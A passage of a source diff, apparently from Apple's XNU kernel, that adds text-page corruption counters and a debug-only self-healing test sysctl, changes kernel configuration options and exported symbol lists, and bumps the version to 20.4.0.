+    &vmtc_byte_counts[5], 0, "text page corruptions with 17 to 32 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_64_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[6], 0, "text page corruptions with 33 to 64 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_128byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[7], 0, "text page corruptions with 65 to 128 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_256_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[8], 0, "text page corruptions with >128 changed bytes");
+
+#if DEBUG || DEVELOPMENT
+/*
+ * A sysctl that can be used to corrupt a text page with an illegal instruction.
+ * Used for testing text page self healing.
+ */
+extern kern_return_t vm_corrupt_text_addr(uintptr_t);
+static int
+corrupt_text_addr(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+{
+       uint64_t value = 0;
+       int error = sysctl_handle_quad(oidp, &value, 0, req);
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       if (vm_corrupt_text_addr((uintptr_t)value) == KERN_SUCCESS) {
+               return 0;
+       } else {
+               return EINVAL;
+       }
+}
+
+SYSCTL_PROC(_vm, OID_AUTO, corrupt_text_addr,
+    CTLTYPE_QUAD | CTLFLAG_WR | CTLFLAG_LOCKED | CTLFLAG_MASKED,
+    0, 0, corrupt_text_addr, "-", "");
+#endif /* DEBUG || DEVELOPMENT */
index b4d6d6fc64792c56b69765c15d97f036718b1aeb..fc3426fd5976c661098acdda09a13b303fc6f683 100644 (file)
@@ -56,7 +56,6 @@
 
 #include <mach/mach_types.h>
 #include <mach/memory_object_types.h>
-#include <mach/memory_object_control.h>
 #include <mach/vm_map.h>
 #include <mach/mach_vm.h>
 #include <mach/upl.h>
index f439a52cdfb8da4cf973baa8a8f5e7b809a55f35..fc2945bab4c5959d8fea2ddf90c9d88cd5c2880d 100644 (file)
@@ -569,7 +569,6 @@ _sysctl__machdep_children
 _sysctl__net_children
 _sysctl__sysctl_children
 _sysctl__vfs_children
-_sysctl__vfs_generic
 _sysctl__vfs_generic_children
 _sysctl__vm_children
 _sysctl_handle_int
index cdf84e788d81f03df524110b0ba299c0c2d3b952..f782bc54055857527391a81e437ef8209bd3620a 100644 (file)
@@ -880,6 +880,7 @@ __ZN18IOMemoryDescriptor13removeMappingEP11IOMemoryMap
 __ZN18IOMemoryDescriptor15getDMAMapLengthEPy
 __ZN18IOMemoryDescriptor15getDescriptorIDEv
 __ZN18IOMemoryDescriptor16getPreparationIDEv
+__ZN18IOMemoryDescriptor16setPreparationIDEv
 __ZN18IOMemoryDescriptor17_CopyState_InvokeE5IORPCP15OSMetaClassBasePFiS2_P17_IOMDPrivateStateE
 __ZN18IOMemoryDescriptor18getPhysicalAddressEv
 __ZN18IOMemoryDescriptor20CreateMapping_InvokeE5IORPCP15OSMetaClassBasePFiS2_yyyyyPP11IOMemoryMapE
@@ -1341,6 +1342,8 @@ __ZN29IOInterleavedMemoryDescriptorD2Ev
 __ZN29IOInterleavedMemoryDescriptordlEPvm
 __ZN29IOInterleavedMemoryDescriptornwEm
 __ZN6IOPMGR10gMetaClassE
+__ZN6IOPMGR13enableCPUCoreEj
+__ZN6IOPMGR13enableCPUCoreEjy
 __ZN6IOPMGRC2EPK11OSMetaClass
 __ZN6IOPMGRD2Ev
 __ZN6IOPMGRdlEPvm
@@ -1473,6 +1476,7 @@ __ZN9IOService20callPlatformFunctionEPKcbPvS2_S2_S2_
 __ZN9IOService20getDeviceMemoryCountEv
 __ZN9IOService20powerOverrideOffPrivEv
 __ZN9IOService20unlockForArbitrationEv
+__ZN9IOService20ClientCrashed_InvokeE5IORPCP15OSMetaClassBasePFiS2_PS_yE
 __ZN9IOService21CopyProperties_InvokeE5IORPCP15OSMetaClassBasePFiS2_PP12OSDictionaryE
 __ZN9IOService21SearchProperty_InvokeE5IORPCP15OSMetaClassBasePFiS2_PKcS4_yPP8OSObjectE
 __ZN9IOService21getClientWithCategoryEPK8OSSymbol
index 8e67942f2c15255448f1b4d2c6988710e0cd478a..eb6d0f4382eaaa40c658cbb270ceb29ba5987841 100644 (file)
@@ -690,6 +690,7 @@ _copyin
 _copyinstr
 _copyout
 _copyoutstr
+_coretrust_interface_register
 _crc32
 _debug_ivars_size
 _deflate
index 3e8381e78a9a3a4bce0050739d44ee6b5cf5d413..8beac4230a07112fcf622debff0028eef60302e3 100644 (file)
@@ -293,9 +293,9 @@ options   CONFIG_MFCTBLSIZ=16                       # <bsmall>
 #
 # configurable kernel message buffer size
 #
-options   CONFIG_MSG_BSIZE_REL=4096            # <msgb_small>
-options   CONFIG_MSG_BSIZE_DEV=4096            # <msgb_small>
-options   CONFIG_MSG_BSIZE_REL=16384           # <msgb_large>
+options   CONFIG_MSG_BSIZE_REL=16384           # <msgb_small>
+options   CONFIG_MSG_BSIZE_DEV=131072          # <msgb_small>
+options   CONFIG_MSG_BSIZE_REL=131072          # <msgb_large>
 options   CONFIG_MSG_BSIZE_DEV=131072          # <msgb_large>
 options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_REL        # <!development,debug>
 options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV        # <development,debug>
@@ -306,6 +306,12 @@ options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV    # <development,debug>
 options   CONFIG_IPC_TABLE_ENTRIES_STEPS=64    # 137898 entries        # <bsmall,small,xsmall>
 options   CONFIG_IPC_TABLE_ENTRIES_STEPS=256   # 300714 entries        # <medium,large,xlarge>
 
+#
+# maximum copyout size for IPC debugging tools
+#
+options CONFIG_IPC_KERNEL_MAP_SIZE=16  # 16M   # <bsmall,small,xsmall>
+options CONFIG_IPC_KERNEL_MAP_SIZE=64  # 64M   # <medium,large,xlarge>
+
 #
 #  configurable kernel - use these options to strip strings from panic
 #  and printf calls.
@@ -573,11 +579,6 @@ options            CONFIG_KAS_INFO         # kas_info support      # <config_kas_info>
 #
 # MACH configuration options.
 #
-# TASK_SWAPPER enables code that manages demand for physical memory by
-#      forcibly suspending tasks when the demand exceeds supply. This
-#      option should be on.
-#
-options                TASK_SWAPPER    #       <task_swapper_disabled>
 
 #
 # This defines configuration options that are normally used only during
@@ -607,7 +608,6 @@ options             MACH_VM_DEBUG   #                               # <debug>
 #      hardclock device driver.
 #
 options                MACH_MP_DEBUG   #                               # <debug>
-options                CONFIG_ZCACHE   # Enable per-cpu caching for zones      # <config_zcache>
 options                CONFIG_ZLEAKS   # Live zone leak debugging      # <zleaks>
 
 #
@@ -650,10 +650,6 @@ options     KPC                    # <kpc>
 
 options     PGO                    # <pgo>
 
-# MACH_COUNTERS enables code that handles various counters in the system.
-#
-options                MACH_COUNTERS   #                           # <debug>
-
 # DEVELOPMENT define for development builds
 options                DEVELOPMENT     # dev kernel                # <development>
 
@@ -742,6 +738,7 @@ options             CONFIG_SERIAL_KDP   # KDP over serial   # <config_serial_kdp>
 options                CONFIG_KDP_INTERACTIVE_DEBUGGING        # <kdp_interactive_debugging>
 
 options        CONFIG_TASKWATCH
+options        CONFIG_USER_NOTIFICATION                # <config_user_notification>
 #
 # Kernel Power On Self Tests
 #
@@ -752,11 +749,6 @@ options            CONFIG_XNUPOST                          # <config_xnupost>
 #
 options PROC_REF_DEBUG                                 # <proc_ref_debug>
 
-#
-# Kernel OS reason debug instrumentation
-#
-options OS_REASON_DEBUG                                        # <os_reason_debug>
-
 #
 # Kernel Voucher Attr Manager for Activity Trace
 #
@@ -772,6 +764,9 @@ options             CONFIG_SYSDIAGNOSE                      # <config_sysdiagnose>
 options                CONFIG_CSR                              # <config_csr>
 options                CONFIG_CSR_FROM_DT              # <config_csr_from_dt>
 
+# Enable collection of IO Compression statistics
+options                CONFIG_IO_COMPRESSION_STATS             # <config_io_compression_stats>
+
 #
 # Console options
 #
index 0dbf52e8f645198578dc3b69d9230c4b76efeb11..d5a077c24a68622ace76bc3071f962b4de40265f 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -50,7 +50,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct ]
+#  MACH_BASE =      [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct config_io_compression_stats ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 15846736a1d1886639a31ed329d2da3aed31daa0..e8e1a0f56db18f71e0b4fa252f7fc0a9a01dde18 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -52,7 +52,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct config_io_compression_stats ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 3fd4f903c35557791ba8331cf9d9a46bf4786fa2..825b8991948ddb20b03638faddeab49b6037f7d7 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
index 509472214e92048834f57470b9193d43d947820b..bdd95c53c0fa261196e04849eeff4a53896e42cd 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage config_uexc config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE ]
 #  VPN =            [ ipsec flow_divert necp content_filter ]
 #  PF =             [ pf pflog ]
 #  MULTIPATH =      [ multipath mptcp ]
+#if defined(SOC_CONFIG_t8020)
 #  HIBERNATION =    [ ]
+#else /*!(defined(SOC_CONFIG_t8020)*/
+#  HIBERNATION =    [ ]
+#endif /*!(defined(SOC_CONFIG_t8020)*/
 #  IOKIT_BASE =     [ iokit iokitcpp no_kernel_hid config_sleep iokitstats HIBERNATION ]
 #  IOKIT_RELEASE =  [ IOKIT_BASE ]
 #  IOKIT_DEV =      [ IOKIT_BASE iotracking ]
@@ -53,7 +57,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz config_user_notification phys_write_acct ]
 #  MACH_RELEASE =   [ MACH_BASE debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index e1d6bfd92e843d5fc9710e307090deea6567078a..4ce67ae9172a4480790cfb4bce06468d5fa8e0cf 100644 (file)
@@ -17,9 +17,9 @@
 #  -------- ----- -- ---------------
 #
 #  ARM_EXTRAS_BASE = [ nos_arm_pmap nos_arm_asm ]
-#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging config_zcache ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
index 98852a7f7bfa5d23d4da998be11969e035f6fdce..f16f3b90606624b57ddaaa9c8fb0f58991a56dc7 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -52,7 +52,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_io_compression_stats phys_write_acct ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 31d87fd6f5bdfb1beeddf367ac928583dfa066f8..7bae7f33bf9ca0ebe6650748afda601c2374052f 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ intel medium msgb_large config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage vsprintf ]
+#  KERNEL_BASE =    [ intel medium msgb_large config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage vsprintf ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ]
 #  BSD_BASE =       [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_imageboot_chunklist config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_32bit_telemetry config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE ]
@@ -48,7 +48,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ]
 #  PERF_DBG_DEV    =[ PERF_DBG_BASE lock_stats ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats ]
-#  MACH_BASE =      [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct ]
+#  MACH_BASE =      [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct config_user_notification ]
 #  MACH_RELEASE =   [ MACH_BASE ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max importance_debug ]
index 7da98bbff60f2f5d2411c4bbabfad07ac7a14d15..11d867f00025cf35f033a23fb7a4694a9b31066c 100644 (file)
@@ -1,4 +1,4 @@
-20.3.0
+20.4.0
 
 # The first line of this file contains the master version number for the kernel.
 # All other instances of the kernel version in xnu are derived from this file.
index 8091f7218faaf938c6e0ca2428cc82559f3cc781..a3af4d729805e4b3a3fe053a4ed333fbe24b1306 100644 (file)
@@ -13,6 +13,7 @@ _ml_get_conttime_offset
 _ml_get_wake_timebase
 _ml_set_reset_time
 _proc_getcdhash
+_ml_cpu_init_completed
 _cpu_broadcast_xcall
 _cpu_xcall
 _cpu_broadcast_immediate_xcall
index 1c0e13e390746e35f0cf47386a1d69ba78f66d7d..09e5a5df76be374eaa26f51fcc948ebc5b96bb93 100644 (file)
@@ -41,6 +41,7 @@ _sched_perfcontrol_edge_matrix_set
 _sched_perfcontrol_update_callback_deadline
 _thread_group_join_io_storage
 _thread_group_join_perf_controller
+_ml_cpu_init_completed
 _ml_cpu_signal
 _ml_cpu_signal_deferred
 _ml_cpu_signal_retract
@@ -70,8 +71,6 @@ _pmap_iommu_map
 _pmap_iommu_unmap
 _pmap_iommu_iovmfree
 _pmap_iommu_ioctl
-_pmap_iommu_grant_page
-_pmap_iommu_alloc_contiguous_pages
 _nvme_ppl_get_desc
 _sart_get_desc
 _t8020dart_get_desc
index 28b023dd9626a09f202094b8e571847a233da114..71f343419ccb7655d9a0cbfef0f05f1a603dcd87 100644 (file)
@@ -3,7 +3,6 @@ __ZN15IORegistryEntry18setIndexedPropertyEjP8OSObject
 __ZNK15IORegistryEntry18getIndexedPropertyEj
 __ZN16IOPlatformExpert*
 __ZNK16IOPlatformExpert*
-__ZN18IOMemoryDescriptor16setPreparationIDEv
 __ZTV16IOPlatformExpert
 __ZN18IODTPlatformExpert*
 __ZNK18IODTPlatformExpert*
@@ -149,6 +148,8 @@ _bufattr_markisochronous
 _bufattr_markmeta
 _bufattr_markquickcomplete
 _bufattr_meta
+_bufattr_markexpeditedmeta
+_bufattr_expeditedmeta
 _bufattr_nocache
 _bufattr_passive
 _bufattr_quickcomplete
@@ -466,6 +467,10 @@ _kern_packet_append
 _kern_packet_get_next
 _kern_packet_set_chain_counts
 _kern_packet_get_chain_counts
+_kern_packet_trace_start
+_kern_packet_trace_end
+_kern_packet_is_traced
+_kern_packet_trace_event
 _kern_pbufpool_alloc
 _kern_pbufpool_alloc_batch
 _kern_pbufpool_alloc_batch_callback
@@ -491,6 +496,7 @@ _kern_config_is_development
 _kern_stack_snapshot_with_reason
 _kernel_debug_string
 _kext_receipt
+_kext_receipt_set_queried
 _kmem_alloc_kobject:_kmem_alloc_kobject_external
 _kmem_alloc_pageable:_kmem_alloc_pageable_external
 _kx_qsort
@@ -598,6 +604,8 @@ _pmap_load_image4_trust_cache
 _pmap_lockdown_image4_slab
 _pmap_lookup_in_static_trust_cache
 _pmap_lookup_in_loaded_trust_caches
+_pmap_set_compilation_service_cdhash
+_pmap_match_compilation_service_cdhash
 _port_name_to_task
 _port_name_to_thread
 _post_sys_powersource
@@ -621,6 +629,7 @@ _proc_set_syscall_filter_callbacks
 _proc_set_syscall_filter_index
 _proc_set_syscall_filter_mask
 _proc_selfcsflags
+_proc_skip_mtime_update
 _proc_starttime
 _proc_task
 _proc_uniqueid
@@ -717,6 +726,7 @@ _throttle_lowpri_io_will_be_throttled
 _throttle_lowpri_window
 _throttle_set_thread_io_policy
 _throttle_get_thread_effective_io_policy
+_throttle_thread_io_tier_above_metadata
 _timeout
 _timeout_with_leeway
 _tk_nin
@@ -751,10 +761,12 @@ _utun_ctl_register_dtls
 _utun_pkt_dtls_input
 _vfs_context_bind
 _vfs_context_can_resolve_triggers
+_vfs_context_dataless_materialization_is_prevented
 _vfs_context_get_special_port
 _vfs_context_set_special_port
 _vfs_context_is_dataless_manipulator
 _vfs_devvp
+_vfs_get_thread_fs_private
 _vfs_getattr
 _vfs_getbyid
 _vfs_is_basesystem
@@ -762,6 +774,7 @@ _vfs_mntlabel
 _vfs_mount_id
 _vfs_nativexattrs
 _vfs_set_root_unmounted_cleanly
+_vfs_set_thread_fs_private
 _vfs_setcompoundopen
 _vfs_throttle_mask
 _vfs_vnodecovered
index 7983266f347bc3543a6c8192a167df842d12d12e..83401d90a0b25828df0f4b74ee791aec26a06cc0 100644 (file)
@@ -2,9 +2,10 @@ _IOGetBootKeyStoreData
 _IOGetAPFSKeyStoreData
 _IOSetAPFSKeyStoreData
 _IOGetARVRootHashData
-_IOSetARVRootHashData
 _IOGetARVManifestData
-_IOSetARVManifestData
+_IOGetBaseSystemARVRootHashData
+_IOGetBaseSystemARVManifestData
+_IOBaseSystemARVRootHashAvailable
 __Z33IOSKCopyKextIdentifierWithAddressm
 __ZN14IOPMrootDomain17requestUserActiveEP9IOServicePKc
 __ZN14IOPMrootDomain20claimSystemBootEventEP9IOServicejPKcP8OSObject
@@ -113,6 +114,7 @@ _hv_ast_pending
 _hv_disable
 _hv_ept_pmap_create
 _hv_get*
+_hv_io_notifier*
 _hv_release*
 _hv_set*
 _hv_trace*
index dbe2508521a3131b399a110fd1ed38f2d28fda76..6ad33d6fdfa91adc5ab6362469e608c50cc1102a 100644 (file)
@@ -34,3 +34,8 @@ __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert4Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert5Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert6Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert7Ev
+_KUNCExecute
+_KUNCGetNotificationID
+_KUNCUserNotificationDisplayAlert
+_KUNCUserNotificationDisplayFromBundle
+_KUNCUserNotificationDisplayNotice
index d83a6923b64355fa171b8c531a725399159c1f0e..cb57707545f18bbfeb47fd7c5b9322498597b83d 100644 (file)
@@ -1,9 +1,4 @@
 _Debugger
-_KUNCExecute
-_KUNCGetNotificationID
-_KUNCUserNotificationDisplayAlert
-_KUNCUserNotificationDisplayFromBundle
-_KUNCUserNotificationDisplayNotice
 _NDR_record
 _OSSpinLockTry
 _OSSpinLockUnlock
index 927f16da90606a1e8d5cbe95889e747c08cf6343..b49ffcab9cefe0d545c08aa71ab79ec430c8fe89 100644 (file)
@@ -14,3 +14,8 @@ __ZN5IORTC15_RESERVEDIORTC4Ev
 __ZN5IORTC15_RESERVEDIORTC5Ev
 __ZN5IORTC15_RESERVEDIORTC6Ev
 __ZN5IORTC15_RESERVEDIORTC7Ev
+_KUNCExecute
+_KUNCGetNotificationID
+_KUNCUserNotificationDisplayAlert
+_KUNCUserNotificationDisplayFromBundle
+_KUNCUserNotificationDisplayNotice
index a56a15f2f53bf710d4c909fa374d27d98fb7d49a..744ae9c6b2b4b69d6a751a120dc85c8086a82cc2 100755 (executable)
@@ -15,6 +15,11 @@ if [ "${OUTPUT##*.}" != "plist" -o "${PLIST##*.}" != "plist" ]; then
 fi
 shift 2
 
+if [ $(egrep -c 'CFBundleIdentifier|OSBundleCompatibleVersion|CFBundleVersion' $PLIST) -lt 3 ]; then
+    echo "error: Invalid input Info.plist $PLIST" 1>&2
+    exit 1
+fi
+
 printf \
